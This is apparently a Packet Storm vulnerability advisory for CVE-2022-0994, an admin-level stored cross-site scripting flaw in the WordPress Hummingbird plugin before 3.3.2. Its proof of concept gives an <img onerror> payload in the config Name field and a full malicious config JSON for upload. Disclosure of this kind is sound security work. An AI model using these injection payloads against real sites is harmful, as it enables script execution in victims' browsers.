WordPress Hummingbird plugin versions prior to 3.3.2 suffers from a persistent cross site scripting vulnerability.
969dc3a879f05f95618233352ae956e5b07885f6bae05c8ee79499adcf514118Tittle:
WordPress Plugin Hummingbird < 3.3.2 - Admin+ Stored Cross-Site Scripting
References:
CVE-2022-0994
Author:
Taurus Omar
Description:
The plugin does not sanitise and escape the Config Name, which could allow high privilege users, such as admin to perform cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.
Affects Plugins:
Hummingbird-performance - Fixed in version 3.3.2
Proof of Concept:
Go to Hummingbird's Settings > Configs > edit the "Name and Description" and put the following payload in the Name field: <img src onerror=alert(/XSS/)>
Save and Click 'Apply' to trigger the XSS
Go to Hummingbird's Settings > Configs and Upload the following config
{
"id": 1,
"name": "<img src onerror=alert(/XSS/)>",
"description": "Xss",
"config": {
"configs": {
"settings": {
"advanced": {
"query_string": false,
"emoji": false,
"cart_fragments": false,
"lazy_load": {
"enabled": false
}
},
"database": {
"reports": {
"enabled": false
}
},
"gravatar": {
"enabled": true
},
"page_cache": {
"enabled": true,
"detection": "auto",
"integrations": {
"varnish": false,
"opcache": false
},
"preload": false
},
"performance": [],
"rss": {
"enabled": true,
"duration": 3600
},
"settings": {
"accessible_colors": false,
"remove_settings": false,
"remove_data": false,
"control": true
},
"uptime": {
"enabled": false
}
}
},
"strings": {
"advanced": [
"Remove query strings from assets - Inactive\nRemove Emoji JS & CSS files - Inactive\nDisable WooCommerce cart fragments - Inactive\nComments lazy loading - Inactive\n"
],
"database": [
""
],
"gravatar": [
"Gravatar cache - Active\n"
],
"page_cache": [
"Page cache - Active\nFile change detection - Auto\nPurge Varnish cache - Inactive\nPurge OpCache - Inactive\nCache preloading - Inactive\n"
],
"rss": [
"RSS caching - Active\n"
],
"settings": [
"High contrast mode - Inactive\nRemove settings on uninstall - Inactive\nRemove data on uninstall - Inactive\nCache control in admin bar - Active\n"
],
"uptime": [
"Uptime - Inactive\n"
]
}
},
"plugin": "1081721"
}
Classification:
Type XSS
OWASP top 10 A7: Cross-Site Scripting (XSS)
CWE-79
wpScan:
https://wpscan.com/vulnerability/e9dd62fc-bb79-4a6b-b99c-60e40f010d7a
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed